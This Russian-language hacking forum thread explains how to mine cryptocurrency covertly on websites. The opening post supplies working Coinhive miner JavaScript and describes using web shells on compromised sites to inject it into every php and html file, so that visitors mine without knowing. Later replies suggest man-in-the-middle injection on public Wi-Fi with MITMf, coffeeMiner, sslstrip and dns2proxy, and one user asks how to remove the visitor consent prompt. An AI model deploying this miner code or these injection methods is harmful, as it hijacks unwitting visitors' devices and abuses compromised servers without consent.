• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Как скрытно майнить на сайтах.

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#1
logo.png
Майнинг, также добыча — деятельность по поддержанию распределённой платформы и созданию новых блоков с возможностью получить вознаграждение в форме новых единиц и комиссионных сборов в различных криптовалютах, в частности в Биткойн.
Coin-hive.com - это сайт, который предлагает вебмастеру встроить в свой сайт утилиту для майнинга биткоинов.

Типичная майнинг-ферма – это высокопроизводительный компьютер с несколькими видеокартами. На первый взгляд кажется, что все просто: подключаешь компьютер к сети, настраиваешь и наблюдаешь, как он зарабатывает деньги.

Вместо того, чтобы создавать ферму из наших видеокарт, мы будем использовать мощность посетителей сайтов. Мы вставим javascript код на все страницы нашего сайта. Для майнинга криптовалюты мы будем использовать библиотеку coinhive.
JavaScript:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
Дальше идет основная часть нашего кода. В ней мы указываем ключ XXXX и имя, которое будет отображаться у нас на странице. Потом мы указываем кол-во потоков, крайне важно, чтобы число потоков не превышало 8 или 16. Далее скрипт вывод в console.log информацию о нашем хэшах.

Подробнее с функциями библиотеки можно ознакомиться
Для просмотра контента необходимо: Войти или зарегистрироваться
.

Код:
<script type="text/javascript">
    var miner = new CoinHive.User("XXXX", "Test");
    miner.start();
 
    setInterval( function() {
        miner.setNumThreads(8);
        miner.setThrottle(0.5);

        console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " +  miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
    }, 1000);
</script>
Допустим мы имеем доступ ко множеству сайтов, где у нас установлен web-shell:
Для просмотра контента необходимо: Войти или зарегистрироваться

Регистрируемся на coinhive, получаем ключ и вставляем его в javascript код. В полуinfection указываем каталог, в файлы которого будет вставлен майнер. Шелл вставит вредоносный скрипт только в файлы имеющие расширение php или html.
Посмотреть вложение 14807
1515879688832.png


Сколько мы получаем хэшей можно посмотреть в консоли. Чем больше на сайте будет посетителей, чем больше хэшей вы получите. Еще как один из вариантов код майнера можно вставить в рекламу или расширение для браузера.
 
Последнее редактирование:

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#3
При редактировании статьи кое-где допустил ошибки...
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#4
Запрещено:
1) Разглашение любой информации данной секции;
Никакого раскрытия информации не было, статью я написал сам и она отличается от той, что находится в gray section. Две разные статьи на 1 тему.
 
Последнее редактирование:
08.11.2016
945
2 712
#5
принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)
 
Симпатии: Понравилось kot-gor

linked3234

Well-known member
14.07.2017
48
2
#7
ребят, вопрос: как вставляется JS код на сайт, сразу выскакивает сообщение, типа "Мол, разреши использовать данному сайту вычислительные мощности твоего компьютера..". Вопрос: это убрать, что бы тупо прямо сразу начался майнинг при заходе на сайт, без оповещения?
 
08.11.2016
945
2 712
#8
как вставляется JS код на сайт
все же написано....

Вопрос: это убрать, что бы тупо прямо сразу начался майнинг
никак... антивирус, вроде блокирует такие js
Для просмотра контента необходимо: Войти или зарегистрироваться
<--вот пример)
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#9
принцип тот же.. что написан в грей!)

ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)
Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner
 
Последнее редактирование:
08.11.2016
945
2 712
#15
Симпатии: Понравилось mrOkey

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
440
833
#17
ну а вообще касаемо данной темки можно включить фантазию)) юзать инструмент MITMF и весь макдональдс и не только, я про фри вай-фай можно заставить майнить всю локал сеть на Вас...

ПС не тестил но думаю %80 что получится)
80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.
 
Симпатии: Понравилось DefWolf

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#18
80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.
Тем более уже давно в публичном wifi стоит защита от MITM атаках
 

Acrono

Red Team
17.04.2017
65
164
#19
Для wifi уже отдельный инструмент написали: https://github.com/arnaucode/coffeeMiner
Тестировал на днях данный инструмент. У него есть один минус: скрипт с майнером внедряется не во все страницы.

80% что в фри вайфай люди сидят с мобильных устройств через приложения, которые без ssl просто блокируют соединение. Пример - приложения vk, facebook, instagramm и bla-bla-bla... как вариант поднять точку с "регистацией в сети" с майнером на странице, но люди там долго не будут задерживаться.
На самом деле, можно поднять sslstrip + dns2proxy и частично это решит проблему с SSL.
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
522
#20
Тестировал на днях данный инструмент. У него есть один минус: скрипт с майнером внедряется не во все страницы.


На самом деле, можно поднять sslstrip + dns2proxy и частично это решит проблему с SSL.
А стоит ли так париться если шанс, что инструмент принесет пользу довольно низкий
 
Вверх Снизу